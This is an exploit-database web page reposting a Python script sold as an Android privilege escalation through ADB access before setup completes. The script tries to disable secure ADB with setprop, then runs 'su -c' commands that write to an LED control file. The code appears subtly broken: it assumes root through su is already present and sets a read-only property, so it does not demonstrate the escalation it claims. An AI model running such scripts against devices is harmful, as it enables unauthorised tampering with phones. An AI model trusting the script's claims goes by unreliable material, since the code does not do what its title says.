Advertisement






Android DeviceVersionFragment.java Privilege Escalation

CVE Category Price Severity
Not specified CWE-264 Not specified High
Author Risk Exploitation Type Date
Not specified High Local 2024-01-14
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2024010050

Below is a copy:

Android DeviceVersionFragment.java Privilege Escalation
#!/usr/bin/env python

import subprocess

# Connect to the device via ADB
subprocess.run(["adb", "devices"])

# Check if the device is in secure USB mode
device = subprocess.run(["adb", "shell", "getprop", "ro.adb.secure"], stdout=subprocess.PIPE)
if "1" in device.stdout.decode():
    # Secure USB mode is enabled, so we need to disable it
    subprocess.run(["adb", "shell", "setprop", "ro.adb.secure", "0"])

# Exploit the vulnerability by accessing ADB before SUW completion
subprocess.run(["adb", "shell"])

# Escalate privileges by executing commands as the root user
subprocess.run(["adb", "shell", "su", "-c", "echo 0 > /sys/class/leds/led:green: charging/brightness"], check=True)
subprocess.run(["adb", "shell", "su", "-c", "echo 100 > /sys/class/leds/led:green: charging/brightness"], check=True)

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.